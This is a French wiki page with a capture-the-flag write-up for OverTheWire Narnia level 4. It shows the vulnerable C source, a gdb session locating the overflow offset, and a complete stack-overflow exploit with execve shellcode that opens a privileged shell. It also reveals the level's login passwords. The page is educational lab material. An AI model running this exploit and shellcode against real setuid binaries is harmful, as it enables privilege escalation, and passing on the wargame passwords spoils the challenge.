Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
— |
overthewire_narnia:level4 [2017/04/09 15:33] (Version actuelle) |
||
---|---|---|---|
Ligne 1: | Ligne 1: | ||
+ | ====== Level 4 ====== | ||
+ | |||
+ | <code> | ||
+ | ssh narnia4@narnia.labs.overthewire.org | ||
+ | pass : thaenohtai | ||
+ | </code> | ||
+ | |||
+ | <code C> | ||
+ | #include <string.h> | ||
+ | #include <stdlib.h> | ||
+ | #include <stdio.h> | ||
+ | #include <ctype.h> | ||
+ | |||
+ | extern char **environ; | ||
+ | |||
+ | int main(int argc,char **argv){ | ||
+ | int i; | ||
+ | char buffer[256]; | ||
+ | |||
+ | for(i = 0; environ[i] != NULL; i++) | ||
+ | memset(environ[i], '\0', strlen(environ[i])); | ||
+ | |||
+ | if(argc>1) | ||
+ | strcpy(buffer,argv[1]); | ||
+ | |||
+ | return 0; | ||
+ | } | ||
+ | </code> | ||
+ | |||
+ | Buffer stack overflow classique, si vous avez l'habitude d'utiliser les variables d'environnement pour mettre votre shellcode cela ne va pas être possible ici : il est entièrement mis à ''NULL'' ! On va donc mettre directement notre shellcode dans ''buffer'' et sauter dessus :) | ||
+ | |||
+ | <code ASM> | ||
+ | gdb$ r $(python -c 'print "\xcc"*272+"BBBB"') | ||
+ | |||
+ | Program received signal SIGSEGV, Segmentation fault. | ||
+ | --------------------------------------------------------------------------[regs] | ||
+ | EAX: 00000000 EBX: F7FD2FF4 ECX: 00000000 EDX: FFFFD919 o d I t s Z a P c | ||
+ | ESI: 00000000 EDI: 00000000 EBP: CCCCCCCC ESP: FFFFD620 EIP: 42424242 | ||
+ | CS: 0023 DS: 002B ES: 002B FS: 0000 GS: 0063 SS: 002BError while running hook_stop: | ||
+ | Cannot access memory at address 0x42424242 | ||
+ | 0x42424242 in ?? () | ||
+ | gdb$ x/200x $esp | ||
+ | 0xffffd620: 0x00000000 0xffffd6c4 0xffffd6d0 0xf7fdf420 | ||
+ | 0xffffd630: 0xffffffff 0xf7ffcff4 0x0804827a 0x00000001 | ||
+ | 0xffffd640: 0xffffd680 0xf7fedd61 0xf7ffdad0 0xf7fd72e8 | ||
+ | 0xffffd650: 0x00000001 0xf7fd2ff4 0x00000000 0x00000000 | ||
+ | 0xffffd660: 0xffffd698 0x5326f6a1 0x7db14eb1 0x00000000 | ||
+ | 0xffffd670: 0x00000000 0x00000000 0x00000002 0x080483a0 | ||
+ | 0xffffd680: 0x00000000 0xf7ff3f70 0xf7e89d5b 0xf7ffcff4 | ||
+ | 0xffffd690: 0x00000002 0x080483a0 0x00000000 0x080483c1 | ||
+ | 0xffffd6a0: 0x08048454 0x00000002 0xffffd6c4 0x08048500 | ||
+ | 0xffffd6b0: 0x08048560 0xf7feed80 0xffffd6bc 0xf7ffd918 | ||
+ | 0xffffd6c0: 0x00000002 0xffffd7f4 0xffffd804 0x00000000 | ||
+ | 0xffffd6d0: 0xffffd919 0xffffd929 0xffffd93d 0xffffd95e | ||
+ | 0xffffd6e0: 0xffffd971 0xffffd984 0xffffd991 0xffffde81 | ||
+ | 0xffffd6f0: 0xffffde8c 0xffffde98 0xffffdee5 0xffffdefc | ||
+ | 0xffffd700: 0xffffdf0b 0xffffdf17 0xffffdf28 0xffffdf31 | ||
+ | 0xffffd710: 0xffffdf44 0xffffdf4c 0xffffdf5c 0xffffdf71 | ||
+ | 0xffffd720: 0xffffdfa6 0xffffdfc6 0x00000000 0x00000020 | ||
+ | 0xffffd730: 0xf7fdf420 0x00000021 0xf7fdf000 0x00000010 | ||
+ | 0xffffd740: 0x17898175 0x00000006 0x00001000 0x00000011 | ||
+ | 0xffffd750: 0x00000064 0x00000003 0x08048034 0x00000004 | ||
+ | 0xffffd760: 0x00000020 0x00000005 0x00000007 0x00000007 | ||
+ | 0xffffd770: 0xf7fe0000 0x00000008 0x00000000 0x00000009 | ||
+ | 0xffffd780: 0x080483a0 0x0000000b 0x000036b4 0x0000000c | ||
+ | 0xffffd790: 0x000036b4 0x0000000d 0x000036b4 0x0000000e | ||
+ | 0xffffd7a0: 0x000036b4 0x00000017 0x00000000 0x00000019 | ||
+ | 0xffffd7b0: 0xffffd7db 0x0000001f 0xffffdfe8 0x0000000f | ||
+ | 0xffffd7c0: 0xffffd7eb 0x00000000 0x00000000 0x00000000 | ||
+ | 0xffffd7d0: 0x00000000 0x00000000 0x08000000 0x5b4ce26c | ||
+ | 0xffffd7e0: 0x85af5645 0x503435d7 0x69632138 0x00363836 | ||
+ | 0xffffd7f0: 0x00000000 0x706d742f 0x2f346e2f 0x6e72616e | ||
+ | 0xffffd800: 0x00346169 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd810: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd820: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd830: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd840: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd850: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd860: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd870: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd880: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd890: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd8a0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd8b0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd8c0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd8d0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd8e0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd8f0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd900: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc | ||
+ | 0xffffd910: 0xcccccccc 0x42424242 0x00000000 0x00000000 | ||
+ | </code> | ||
+ | |||
+ | Nous pouvons donc par exemple sauter à l'adresse ''0xffffd830''. | ||
+ | |||
+ | <code> | ||
+ | narnia4@melissa:/tmp/n4$ ./narnia4 $(python -c 'print "\x90"*239+"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"+"\x30\xd8\xff\xff"') | ||
+ | bash-4.2$ id | ||
+ | uid=14004(narnia4) gid=14004(narnia4) euid=14005(narnia5) groups=14005(narnia5),14004(narnia4) | ||
+ | bash-4.2$ cat /etc/narnia_pass/narnia5 | ||
+ | faimahchiy | ||
+ | </code> | ||